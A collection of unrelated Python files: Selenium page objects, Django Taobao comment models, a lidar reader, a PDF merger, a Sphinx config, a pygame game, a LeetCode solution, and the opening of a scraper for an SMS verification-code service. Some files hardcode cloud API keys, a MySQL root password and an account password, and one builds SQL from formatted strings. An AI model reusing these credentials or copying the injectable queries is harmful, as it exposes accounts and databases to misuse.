return agent.context().lookup('webfront')
@pytest.fixture(scope='module')
def server_url(webfront):
return os.environ.get('AVA_TEST_URL', webfront.local_base_url)
@pytest.fixture(scope='module')
def access_token(webfront):
return webfront.access_token
@pytest.fixture
def browser(request):
browser_type = os.environ.get('AVA_TEST_BROWSER', 'Firefox')
if browser_type == 'PhantomJS':
b = webdriver.PhantomJS()
if browser_type == 'Chrome':
b = webdriver.Chrome()
elif browser_type == 'Opera':
b = webdriver.Opera()
elif browser_type == 'IE':
b = webdriver.Ie()
elif browser_type == 'Safari':
b = webdriver.Safari()
elif browser_type == 'Remote':
b = webdriver.Remote()
else:
b = webdriver.Firefox()
b.implicitly_wait(5)
def teardown_browser():
b.quit()
request.addfinalizer(teardown_browser)
return b
class WebPage(object):
def __init__(self, browser, base_url, access_token=None):
self.browser = browser
self.base_url = base_url
self.access_token = access_token
def open(self):
self.browser.get(self.base_url)
def login(self):
self.browser.get(self.base_url + '#login/' + self.access_token)
def click_user_panel_btn(self):
btn = self.find_element_by_xpath("//a[@href='#user_panel']")
btn.click()
def click_logout_button(self):
logout_btn = self.find_element_by_xpath("//a[@href='#logout']")
logout_btn.click()
def click_yes_on_confirm(self):
yes_btn = self.find_element_by_id('yesBtn')
yes_btn.click()
def click_no_on_confirm(self):
no_btn = self.find_element_by_id('noBtn')
no_btn.click()
def click_ok_on_message_box(self):
ok_btn = self.find_element_by_id('noBtn')
ok_btn.click()
def logout(self):
self.click_user_panel_btn()
self.click_logout_button()
self.click_yes_on_confirm()
self.click_ok_on_message_box()
def find_element_by_id(self, elmt_id):
return self.browser.find_element_by_id(elmt_id)
def find_elements_by_id(self, elmt_id):
return self.browser.find_elements_by_id(elmt_id)
def find_element_by_tag_name(self, tag_name):
return self.browser.find_element_by_tag_name(tag_name)
def find_elements_by_tag_name(self, tag_name):
return self.browser.find_elements_by_tag_name(tag_name)
def find_element_by_xpath(self, xpath):
return self.browser.find_element_by_xpath(xpath)
def find_elements_by_xpath(self, xpath):
return self.browser.find_elements_by_xpath(xpath)
def sleep(self, secs):
time.sleep(secs)
def assert_front_page(self):
header = self.find_element_by_xpath("//div/div/h1[@class='ui-title']")
assert 'EAvatar' in header.text
class FrontPage(WebPage):
def __init__(self, *args, **kwargs):
super(FrontPage, self).__init__(*args, **kwargs)
class HomePage(WebPage):
def __init__(self, *args, **kwargs):
super(HomePage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
class ConsolePage(WebPage):
def __init__(self, *args, **kwargs):
super(ConsolePage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
link = self.browser.find_element_by_id('console_link')
link.click()
class NoticesPage(WebPage):
def __init__(self, *args, **kwargs):
super(NoticesPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
link = self.browser.find_element_by_id('notices_link')
link.click()
class ScriptsPage(WebPage):
def __init__(self, *args, **kwargs):
super(ScriptsPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
link = self.browser.find_element_by_xpath("//a[@href='#scripts']")
link.click()
class JobsPage(WebPage):
def __init__(self, *args, **kwargs):
super(JobsPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
link = self.browser.find_element_by_id("jobs_link")
link.click()
class LogsPage(WebPage):
def __init__(self, *args, **kwargs):
super(LogsPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
self.assert_front_page()
link = self.browser.find_element_by_id("logs_link")
link.click()
class OptionsPage(WebPage):
def __init__(self, *args, **kwargs):
super(OptionsPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
# click the 'Recent Logs' button
|
#-*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from shopback.base.fields import BigIntegerAutoField
ROLE_CHOICES = (
('seller',u'卖家'),
('buyer',u'买家')
)
RESULT_CHOICES = (
('good',u'好评'),
('neutral',u'中评'),
('bad',u'差评'),
)
class Comment(models.Model):
id = BigIntegerAutoField(primary_key=True)
num_iid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'商品ID')
tid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'交易ID')
oid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'订单ID')
item_title = models.CharField(max_length=148,blank=True,verbose_name=u'商品标题')
item_pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
item_price = models.DecimalField(max_digits=10,null=True,decimal_places=2,verbose_name=u'商品价格')
valid_score = models.BooleanField(default=True,verbose_name=u'是否记分')
role = models.CharField(max_length=8,choices=ROLE_CHOICES,verbose_name=u'角色')
result = models.CharField(max_length=8,blank=True,choices=RESULT_CHOICES,verbose_name=u'评价结果')
nick = models.CharField(max_length=32,blank=True,verbose_name=u'评价者')
rated_nick = models.CharField(max_length=32,blank=True,verbose_name=u'被评价者')
content = models.CharField(max_length=1500,blank=True,verbose_name=u'评价内容')
reply = models.CharField(max_length=1500,blank=True,verbose_name=u'评价解释')
is_reply = models.BooleanField(default=False,verbose_name=u'已解释')
ignored = models.BooleanField(default=False,verbose_name=u'已忽略')
replayer = models.ForeignKey(User,null=True,default=None,verbose_name=u'评价人')
replay_at = models.DateTimeField(db_index=True,blank=True,null=True,verbose_name=u'解释日期')
created = models.DateTimeField(blank=True,null=True,verbose_name=u'创建日期')
class Meta:
db_table = 'shop_comments_comment'
unique_together = ('num_iid', 'tid', 'oid', 'role')
verbose_name = u'交易评论'
verbose_name_plural = u'交易评论列表'
def reply_order_comment(self,content,replayer):
import datetime
from auth import apis
from shopback.items.models import Item
rel_item = Item.objects.get(num_iid=self.num_iid)
res = apis.taobao_traderate_explain_add(oid=self.oid,
reply=content,
tb_user_id=rel_item.user.visitor_id)
if not res['traderate_explain_add_response']['is_success']:
raise Exception('解释失败!')
self.reply = content
self.replayer = replayer
self.replay_at = datetime.datetime.now()
self.is_reply = True
self.save()
class CommentItem(models.Model):
num_iid = models.BigIntegerField(primary_key=True,verbose_name=u'商品ID')
title = models.CharField(max_length=64,blank=True,verbose_name=u'标题')
pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
updated = models.DateTimeField(blank=True,null=True,verbose_name=u'更新日期')
is_active = models.BooleanField(default=True,verbose_name=u'有效')
class Meta:
db_table = 'shop_comments_commentitem'
verbose_name = u'评价商品'
verbose_name_plural = u'评价商品列表'
class CommentGrade(models.Model):
GRADE_GOOD = 1
GRADE_NORMAL = 2
GRADE_BAD = 0
GRADE_CHOICE = (
(GRADE_GOOD,u'优秀'),
(GRADE_NORMAL,u'合格'),
(GRADE_BAD,u'不合格'),
)
id = BigIntegerAutoField(primary_key=True)
num_iid = models.BigIntegerField(null=False,verbose_name=u'商品ID')
tid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'交易ID')
oid = models.BigIntegerField(null=False,verbose_name=u'订单ID')
reply = models.TextField(max_length=1500,blank=True,verbose_name=u'评价解释')
created = models.DateTimeField(blank=True,null=True,auto_now=True,verbose_name=u'创建日期')
replay_at = models.DateTimeField(db_index=True,blank=True,null=True,verbose_name=u'解释日期')
replayer = models.ForeignKey(User,null=True,default=None,related_name='grade_replyers',verbose_name=u'评价人')
grader = models.ForeignKey(User,null=True,default=None,related_name='grade_maker',verbose_name=u'打分人')
grade = models.IntegerField(default=GRADE_BAD,choices=GRADE_CHOICE,verbose_name=u'评价打分')
# item_pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
# detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
# content = models.CharField(max_length=1500,blank=True,verbose_name=u'评价内容')
class Meta:
db_table = 'shop_comments_grade'
unique_together = ('num_iid', 'tid', 'oid')
verbose_name = u'评论打分'
verbose_name_plural = u'评论打分列表'
|
import os
import numpy as np
import json
import struct
import open3d
# data_set_file = os.getcwd()+'\\data_set\\lidar_semantic_bboxes\\'
def read_file(file_name=os.getcwd()+'\\data_set\\lidar_semantic_bboxes\\'):
# 输入为数据集绝对路径
# 输出为.npz文件和.json文件位置
npz_dir = []
_3D_label_dir = []
dirs = os.listdir(file_name)
for di in dirs:
if os.path.isdir(file_name+di):
temp1 = os.listdir(file_name+di+'\\lidar\\cam_front_center')
for i in range(len(temp1)):
temp1[i] = file_name+di+'\\lidar\\cam_front_center\\' + temp1[i]
npz_dir.extend(temp1)
temp2 = os.listdir(file_name+di+'\\label3D\\cam_front_center')
for i in range(len(temp2)):
temp2[i] = file_name+di+'\\label3D\\cam_front_center\\' + temp2[i]
_3D_label_dir.extend(temp2)
return npz_dir, _3D_label_dir
def read_npz(file_path):
# 输入为.npz文件路径
# 输出为3D点云, 数据类型为np_array
# npz文件的读取方法,注意,这种文件是一种压缩文件,不直接返回数据,使用以下方法获取压缩文件中的文件名
# name_lis = np.load(file_path).files
# print(name_lis)
p_cloud = np.load(file_path)['points']
return p_cloud
def read_json(file_path):
# 返回值为字典列表类型
with open(file_path, 'r') as js_f:
load_dict = json.load(js_f)
return load_dict
def read_bin(path):
pc_list = []
with open(path, 'rb') as f:
content = f.read()
pc_iter = struct.iter_unpack('ffff', content)
for idx, point in enumerate(pc_iter):
pc_list.append([point[0], point[1], point[2]])
return np.asarray(pc_list, dtype=np.float64)
|
from speedycloud.products.cloud_server import CloudServerAPI
api = CloudServerAPI('F8592B402380432895EA8C12BEBF2222', '0eb7bc8c4aa154ce6abb799e4149417ca9b90a5eeb82789d2326082a5b5d2222')
# print api.get_available_zone()
# print api.get_support_isps('SPC-HK-2-A')
# print api.get_os_images('SPC-HK-2-A')
# print api.list()
# print api.provision('SPC-HK-2-A', 'BGP', 'CentOS 7 x64', 1, 1024, 20, 1, private_network='net-zmtyhsbv', price_type='by-month')
# print api.detail(72315)
# print api.backups(72315)
# print api.jobs(72315)
# print api.start(72315)
# print api.restart(72315)
# print api.stop(72315)
# print api.suspend(72315)
# print api.resume(72315)
# print api.backup(72315, 'myBackup1')
# print api.restore_backup(72315, 'myBackup')
# print api.delete_backup(72315, 'myBackup1')
# print api.set_tag(72315, 'myTag')
# print api.set_alias(72315, 'myAlias')
# print api.set_group(72315, 'myGroup')
# print api.change_image(72315, 'Debian 6.0.1')
# print api.attach_disk(72315, 'v-hoabqsir')
# print api.detach_disk(72315, 'v-hoabqsir')
# print api.get_support_images('SPC-BJ-T01')
|
#-*- coding: utf-8 -*-
import wx
import win32api
import sys, os
import logging
from FileListTable import *
from APDFTool import APDFTool
APP_TITLE = u'PDF Document Merge Tool'
APP_ICON = 'pdf_maker.ico'
class mainFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, -1, APP_TITLE, style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER)
# 默认style是下列项的组合:wx.MINIMIZE_BOX | wx.MAXIMIZE_BOX | wx.RESIZE_BORDER | wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN
self.SetBackgroundColour(wx.Colour(224,224,224))
self.SetSize((800, 600))
self.Center()
if hasattr(sys, "frozen") and getattr(sys, "frozen"):
exeName = win32api.GetModuleFileName(win32api.GetModuleHandle(None))
icon = wx.Icon(exeName, wx.BITMAP_TYPE_ICO)
else:
icon = wx.Icon(APP_ICON, wx.BITMAP_TYPE_ICO)
self.SetIcon(icon)
# left
panelLeft = wx.BoxSizer(wx.VERTICAL)
gridDatas = []
self.gridTable = wx.grid.Grid(self, -1, pos=(5,5), size=(400, 400), style=wx.WANTS_CHARS)
self.infoTable = FileListGridTable(gridDatas)
self.gridTable.SetTable(self.infoTable, True)
self.gauge = wx.Gauge(self, range = 20, size = (250, 25), style = wx.GA_HORIZONTAL)
panelLeft.Add(self.gridTable, 0, wx.EXPAND|wx.ALL, 5)
panelLeft.Add(self.gauge, 0, wx.EXPAND|wx.ALL, 5)
# right
panelRight = wx.BoxSizer(wx.VERTICAL)
btnOpenFiles = wx.Button(self, -1, u'Open', size=(50, 50))
btnOpenFiles.Bind(wx.EVT_BUTTON, self.OpenFiles)
btnMoveUp = wx.Button(self, -1, u'↑', size=(50, 50))
btnMoveUp.Bind(wx.EVT_BUTTON, self.MoveUp)
btnMoveDown = wx.Button(self, -1, u'↓', size=(50, 50))
btnMoveDown.Bind(wx.EVT_BUTTON, self.MoveDown)
btnMerge = wx.Button(self, -1, u'Merge', size=(50,50))
btnMerge.Bind(wx.EVT_BUTTON, self.MergePDFFiles)
btnClear = wx.Button(self, -1, u'Clear', size=(50,50))
btnClear.Bind(wx.EVT_BUTTON, self.ClearFiles)
panelRight.Add(btnOpenFiles, 0, wx.ALL, 10)
panelRight.Add(btnMoveUp, 0, wx.ALL, 10)
panelRight.Add(btnMoveDown, 0, wx.ALL, 10)
panelRight.Add(btnMerge, 0, wx.ALL, 10)
panelRight.Add(btnClear, 0, wx.ALL, 10)
mainBox = wx.BoxSizer(wx.HORIZONTAL)
mainBox.Add(panelLeft, 1, wx.EXPAND|wx.LEFT|wx.TOP|wx.BOTTOM, 5)
mainBox.Add(panelRight, 0, wx.EXPAND|wx.ALL, 20)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_SIZE, self.OnResize)
self.SetAutoLayout(True)
self.SetSizer(mainBox)
self.Layout()
logging.basicConfig(level = logging.INFO,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
self.logger = logging.getLogger(__name__)
def MoveUp(self, evt):
selectedRows = self.gridTable.GetSelectedRows()
self.logger.info(selectedRows)
for row in selectedRows:
self.logger.info(row)
self.infoTable.RowMoveUp(row)
def MoveDown(self, evt):
selectedRows = self.gridTable.GetSelectedRows()
self.logger.info(selectedRows)
for row in selectedRows:
self.logger.info(row)
self.infoTable.RowMoveDown(row)
def ClearFiles(self, evt):
self.infoTable.ClearRows()
def MergePDFFiles(self, evt):
def SetUageValue(value):
self.gauge.SetValue(value)
rowsCount = self.infoTable.GetNumberRows()
files = []
for i in range(rowsCount):
files.append(self.infoTable.GetValue(i, 1))
if len(files):
self.saveFile()
tool = APDFTool(files)
pageCount = tool.getTotalPageCount()
self.gauge.SetRange(pageCount)
tool.merge(self.save_pdf_path, SetUageValue)
def saveFile(self):
file_wildcard = "PDF files(*.pdf)|*.pdf"
dlg = wx.FileDialog(self, "Choose PDF files to merge...",
os.getcwd(),
style = wx.FD_SAVE,
wildcard = file_wildcard)
if dlg.ShowModal() == wx.ID_OK:
paths = dlg.GetPaths()
for path in paths:
self.save_pdf_path = path
dlg.Destroy()
def OpenFiles(self, evt):
'''
temporary
'''
file_wildcard = "PDF files(*.pdf)|*.pdf"
dlg = wx.FileDialog(self, "Choose PDF files to merge...",
os.getcwd(),
style = wx.FD_OPEN|wx.FD_MULTIPLE,
wildcard = file_wildcard)
if dlg.ShowModal() == wx.ID_OK:
paths = dlg.GetPaths()
for path in paths:
files = []
files.append(path)
tool = APDFTool(files)
count = tool.getTotalPageCount()
self.infoTable.AppendRows([os.path.basename(path), path, count])
dlg.Destroy()
def OnResize(self, evt):
self.Refresh()
evt.Skip()
def OnClose(self, evt):
self.Destroy()
class mainApp(wx.App):
def OnInit(self):
self.SetAppName(APP_TITLE)
self.Frame = mainFrame()
self.Frame.Show()
return True
if __name__ == "__main__":
app = mainApp(redirect=True, filename="debug.log")
app.MainLoop() |
# Enthought library imports.
from traits.api import HasTraits, Instance, Vetoable
# Local imports.
from task_window import TaskWindow
class TaskWindowEvent(HasTraits):
""" A task window lifecycle event.
"""
# The window that the event occurred on.
window = Instance(TaskWindow)
class VetoableTaskWindowEvent(TaskWindowEvent, Vetoable):
""" A vetoable task window lifecycle event.
"""
pass
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "firecrown"
copyright = "2022, LSST DESC Firecrown Contributors"
author = "LSST DESC Firecrown Contributors"
# The full version, including alpha/beta/rc tags
release = "1.1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"autoclasstoc",
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.mathjax",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"sphinx_autodoc_typehints",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# Attempt to generate a sidebar
html_sidebars = {"**": ["localtoc.html", "sourcelink.html", "searchbox.html"]}
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
html_theme_options = {"collapse_navigation": False}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Extension configuration -------------------------------------------------
# mathjax
mathjax_path = (
"https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"
)
# autosummary
autosummary_generate = True
# Some style options
highlight_language = "python3"
pygments_style = "sphinx"
todo_include_todos = True
add_function_parentheses = True
add_module_names = True
set_type_checking_flag = True
typehints_fully_qualified = False
always_document_param_types = True
typehints_document_rtype = True
autodoc_mock_imports = [
"ccl",
"pyccl",
"numpy.typing._ufunc",
"pandas._typing",
"pandas",
"numpy._typing._ufunc",
]
# Napoleon compiles the docstrings into .rst
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = True
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = True
napoleon_use_param = True
napoleon_use_rtype = True
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
sphinx_apidoc_options = [
"members",
"show-inheritance",
"private-members",
"special-members",
]
os.environ["SPHINX_APIDOC_OPTIONS"] = ",".join(sphinx_apidoc_options)
autoclasstoc_sections = [
"public-methods",
"private-methods",
]
# Copied from github.com/sanderslab/magellanmapper:
# automate building API .rst files, necessary for ReadTheDocs, as inspired by:
# https://github.com/readthedocs/readthedocs.org/issues/1139#issuecomment-398083449
def run_apidoc(_):
ignore_paths = []
argv = [
"--separate",
"-f",
"-M",
"-e",
"-E",
"-T",
"-d",
"1",
"-o",
"_api",
"../firecrown",
] + ignore_paths
try:
# Sphinx >= 1.7
from sphinx.ext import apidoc
apidoc.main(argv)
except ImportError:
# Sphinx < 1.7
from sphinx import apidoc
argv.insert(0, apidoc.__file__)
apidoc.main(argv)
|
import face_API as face
import pymysql as pl
import pre_process as pp
import json
infodict = {}
def entercourse(coursename):# Tested
db = pl.connect(host="rm-m5ec899sxqwx2rc9tgo.mysql.rds.aliyuncs.com",
user="root", password="Aa123456", db="classroom", charset='utf8')
cur = db.cursor()
findid = "select courseid from courses where coursename=\"{}\"".format(coursename)
cur.execute(findid)
try:
courseid = cur.fetchone()[0]
except TypeError:
print("No such a course!")
return
select = "select id from {}".format(courseid)
cur.execute(select)
idlist = []
for i in cur.fetchall():
idlist.append(i[0])
global infodict
infodict = {}
for ID in idlist:
getinfo = "select * from students where ID=\"{}\"".format(ID)
cur.execute(getinfo)
lls = cur.fetchall()[0]
infodict[lls[0]] = {'name':lls[1], 'class':lls[2]}
# print(infodict)
cur.close()
db.close()
def rollcall(img_url):
# return json
global infodict
pp.small(img_url)
ls = face.multi_search(img_url)
donels, undonels = [],[]
for i in infodict:
if i in ls:
donels.append(i)
else:
undonels.append(i)
dic = {}
dic["donenumber"] = len(donels)
dic["undonenumber"] = len(undonels)
dic["done"] = form(donels)
dic["undone"] = form(undonels)
with open("display/rollcall.json","w") as fp:
json.dump(dic, fp, ensure_ascii=False, indent = 2)
def form(ls):# Tested
global infodict
dic = {}
for ID in ls:
cl = infodict[ID]['class']
if cl not in dic:
dic[cl] = {}
dic[cl][ID] = infodict[ID]['name']
return dic
|
def checkInitialisationMC(solverWrapperDictionary,positionMaxNumberIterationsCriterion=None,tolerances=None):
checkInitialisationSolverWrapper(solverWrapperDictionary)
if ("asynchronous" in solverWrapperDictionary):
if (solverWrapperDictionary["asynchronous"] is True):
checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances)
def checkInitialisationCMLMC():
pass
def checkInitialisationAMLMC():
pass
def checkInitialisationMLMC(solverWrapperDictionary,positionMaxNumberIterationsCriterion=None,tolerances=None):
checkInitialisationSolverWrapper(solverWrapperDictionary)
if ("asynchronous" in solverWrapperDictionary):
if (solverWrapperDictionary["asynchronous"] is True):
checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances)
def checkInitialisationSolverWrapper(solverWrapperDictionary):
sql = 1 ; ncq = 0 ; nq = 1 # default values
if "outputBatchSize" in solverWrapperDictionary:
sql = solverWrapperDictionary["outputBatchSize"]
if "numberCombinedQoi" in solverWrapperDictionary:
ncq = solverWrapperDictionary["numberCombinedQoi"]
if "numberQoI" in solverWrapperDictionary:
nq = solverWrapperDictionary["numberQoI"]
if (sql > (nq+ncq)):
raise Exception ("solverWrapperDictionary: outputBatchSize exceeding maximum dimension. Set a value <= numberQoI + numberCombinedQoI.")
def checkMaxNumberIterationsCriterion(positionMaxNumberIterationsCriterion,tolerances):
if (positionMaxNumberIterationsCriterion is not None):
if (len(tolerances) == (positionMaxNumberIterationsCriterion + 1)):
pass
else:
raise Exception ("Number of monoCriteria defined in monoCriteriaDictionary and positionMaxNumberIterationsCriterion defined in xmcAlgorithmDictionary not consistent. Should be positionMaxNumberIterationsCriterion = number monoCriteria and the monoCriterion defining the maximum number of iterations set as last entry of monoCriteriaDictionary.")
else:
raise Exception ("positionMaxNumberIterationsCriterion not set in xmcDictionary. Set it in order to run the asynchronous framework.") |
import sys
import pygame
from pygame.sprite import Sprite, Group
def fire_bullet(screen, bullets, rocket):
"""Fire a bullet if limit not reached yet."""
# Create a new bullet and add it to the bullets group
if len(bullets) < 4:
new_bullet = Bullet(screen, rocket)
bullets.add(new_bullet)
def check_events(rocket, screen, bullets):
"""Respond to keypresses and mouse events."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
else:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
rocket.moving_up = True
if event.key == pygame.K_DOWN:
rocket.moving_down = True
if event.key == pygame.K_SPACE:
fire_bullet(screen, bullets, rocket)
elif event.type == pygame.KEYUP:
if event.key == pygame.K_UP:
rocket.moving_up = False
if event.key == pygame.K_DOWN:
rocket.moving_down = False
class Bullet(Sprite):
"""A class to manage bullets fired from the ship"""
def __init__(self, screen, ship):
"""Create a bullet object at the ship's current position"""
super(Bullet, self).__init__()
self.screen = screen
# Create a bullet rect at (0, 0) and then set correct position
self.rect = pygame.Rect(0, 0, 20, 5)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
# Store the bullet's position as a decimal value
self.x = self.rect.x
self.color = (60, 60, 60)
self.speed_factor = 3
def update(self):
"""Move the bullet up the screen."""
# Update the decimal position of the bullet
self.x += self.speed_factor
# Update the rect position
self.rect.x = int(self.x)
self.draw_bullet()
def draw_bullet(self):
"""Draw the bullet to the screen."""
pygame.draw.rect(self.screen, self.color, self.rect)
class Rocket:
def __init__(self, screen):
self.moving_up = False
self.moving_down = False
self.image = pygame.image.load('ship.bmp')
self.image = pygame.transform.rotate(self.image, 270)
self.screen_rect = screen.get_rect()
self.rect = self.image.get_rect()
self.rect.centery = self.screen_rect.centery
self.rect.bottom = self.screen_rect.bottom
self.centery = float(self.rect.centery)
def update(self):
"""Update the rocket's position based on the movement flag."""
if self.moving_up and self.rect.top > self.screen_rect.top:
self.centery -= 2
if self.moving_down and self.rect.bottom < self.screen_rect.bottom:
self.centery += 2
self.rect.centery = int(self.centery)
def blitme(self, screen):
screen.blit(self.image, self.rect)
def run_game():
# Initialize game and create a screen object.
pygame.init()
screen = pygame.display.set_mode((1024, 786))
screen_rect = screen.get_rect()
bullets = Group()
rocket = Rocket(screen)
# Start the main loop for the game.
while True:
# Redraw the screen during each pass through the loop
screen.fill((255, 255, 255))
# Watch for keyboard and mouse events.
check_events(rocket, screen, bullets)
rocket.update()
rocket.blitme(screen)
bullets.update()
for bullet in bullets.copy():
if bullet.x > screen_rect.right:
bullets.remove(bullet)
# Make the most recently drawn screen visible.
pygame.display.flip()
run_game()
|
# Reverse Integer
# Given a 32-bit signed integer, reverse digits of an integer.
#
# Example 1:
#
# Input: 123
# Output: 321
# Example 2:
#
# Input: -123
# Output: -321
# Example 3:
#
# Input: 120
# Output: 21
# Note:
# Assume we are dealing with an environment which could only hold integers within the 32-bit signed integer range. For the purpose of this problem, assume that your function returns 0 when the reversed integer overflows.
class Solution(object):
def reverse(self, x):
isNegative = False
reversed_num = 0
if x == 0:
return 0
elif x < 0:
isNegative = True
x = x * -1
while x>0:
reversed_num = reversed_num * 10 + x%10
x = int(x/10)
if isNegative == False:
if reversed_num <= 2147483647:
return reversed_num
else:
return 0
else:
if reversed_num <= 2147483648:
return -1 * reversed_num
else:
return 0
if __name__ == '__main__':
s=Solution()
print("Solution is : " + str(s.reverse(-123))) |
import requests
import random
# location_types = [
# "Blue",
# "AllGender",
# "Water",
# ]
type_dict = {
"Blue": "Blue Light",
"AllGender": "Bathroom",
"Water": "Water",
}
def get_img_url(ltype):
img_idx = random.randint(0, 2)
url_dict = {
"Blue": f"https://cornell-places-assets.s3.amazonaws.com/bluelight{img_idx}.jpg",
"AllGender": f"https://cornell-places-assets.s3.amazonaws.com/all_gender{img_idx}.jpg",
"Water": f"https://cornell-places-assets.s3.amazonaws.com/water{img_idx}.jpg",
}
return url_dict[ltype]
def get_locationdata(ltype):
url = f"https://www.cornell.edu/about/maps/overlay-items.cfm?layer={ltype}&clearCache=1"
isvalid = False
cnt = 0
while isvalid is False and cnt < 3:
try:
r = requests.get(url, timeout=5)
r.raise_for_status()
except:
cnt += 1
isvalid = False
else:
isvalid = True
req = r.json()
dlist = req.get("items", [])
res = []
for data in dlist:
ndata = dict()
name = str(data.get("Name"))
if (name is not None) and (ltype in type_dict):
ndata["lat"] = data.get("Lat")
ndata["lon"] = data.get("Lng")
ndata["name"] = name
ndata["types"] = type_dict[ltype]
ndata["image_url"] = get_img_url(ltype)
res.append(ndata)
return res
def get_mapdata():
output = []
for tp in type_dict.keys():
output.extend(get_locationdata(tp))
return output
|
# coding=utf-8
import os
import sys
import time
import json
import gevent
import logging
import requests
from utils import save_items, get_items_from_file, add_item_fields, log_init, save_items_with_json
reload(sys)
sys.setdefaultencoding('utf8')
# 速码(www.eobzz.com)
# 账号/密码: hbbhbb(rfM#!EzZU%!3s7*kxbTy)
# 平台接口前缀: 'http://api.eobzz.com/api/do.php?action='
'''
账户基本信息
account_info = {
'user_info': {
u'用户名': 'hbbhbb',
u'账号状态': '正常',
u'手机号码': '',
u'QQ 号码': '244815860',
u'E-Mail': '244815860@qq.com',
u'注册时间': '2017-09-19 15:31:24.69',
u'积 分': '251',
u'可获取号码': '50',
u'备注': '',
u'余额': '0.00',
u'充值总额': '0',
u'分成总额': '0.00',
u'消费总额': '0',
u'可提金额': '0.00',
u'已提金额': '0.00',
u'支付宝账号': '',
u'姓 名': '',
}
u'author_uid': '8902',
}
'''
class Ebozz(object):
def __init__(self):
# 该参数用来存放该平台获取 项目列表 的地址
self.item_url = "http://api.eobzz.com/clt.do?method=searchProByName"
self.api_prefix = r'http://api.eobzz.com/api/do.php?action='
self.author_uid = ''
self.user_name = 'hbbhbb'
self.user_pwd = 'rfM#!EzZU%!3s7*kxbTy'
self.token = ''
self.phone_list = ''
self.headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Host": "api.eobzz.com",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
}
# 保存网站项目信息的文件
website_name = "ebozz"
items_file_name = '{website_name}_items.json'.format(website_name=website_name)
self.items_file = os.path.join(sys.path[0], 'items', items_file_name)
# 保存最终获得的手机号码信息保存文件
current_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
phone_file_name = "{website_name}_phone_{date}.txt".format(website_name=website_name, date=current_date)
self.phone_file = os.path.join(sys.path[0], "data", phone_file_name)
# LOG
month = time.strftime('%Y-%m', time.localtime(time.time()))
log_file_name = '{website_name}_{month}.log'.format(website_name=website_name, month=month)
self.log_file = os.path.join(sys.path[0], 'log', log_file_name)
save_items([], self.phone_file)
log_name = self.__class__.__name__
log_init(log_name, self.log_file)
self.logger = logging.getLogger(log_name)
self.logger.info(u'开始采集' + '-' * 30)
# 统一处理请求部分
def request(self, url, request_type, payload=None):
# url: 请求地址
# request_type: 请求类型
# payload: 请求参数
retry_time = 0
while 1:
try:
